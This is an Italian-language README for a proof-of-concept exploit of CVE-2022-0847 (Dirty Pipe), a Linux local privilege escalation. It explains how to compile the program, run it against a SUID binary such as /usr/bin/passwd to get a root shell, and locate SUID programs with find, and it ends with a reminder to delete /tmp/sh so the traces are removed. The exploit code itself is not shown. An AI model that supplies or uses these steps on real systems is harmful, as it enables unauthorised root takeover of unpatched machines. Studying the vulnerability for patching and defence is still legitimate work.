
Exploit proof-of-concept per CVE-2022-0847 (Dirty Pipe) che consente l'escalation locale dei privilegi tramite manipolazione di binari SUID sui kernel Linux.
Compilazione
Su Linux, compila il programma POC con gcc -o dirty dirty.c
Utilizzo
Esegui il programma con ./dirty SUID, dove SUID è il percorso di un programma con bit SUID.
Di solito si può usare /usr/bin/passwd, ovvero eseguire ./dirty /usr/bin/passwd

Si può ottenere una shell di root.
Puoi usare find / -perm /4000 per cercare i programmi con bit SUID.


Non dimenticare di eliminare /tmp/sh
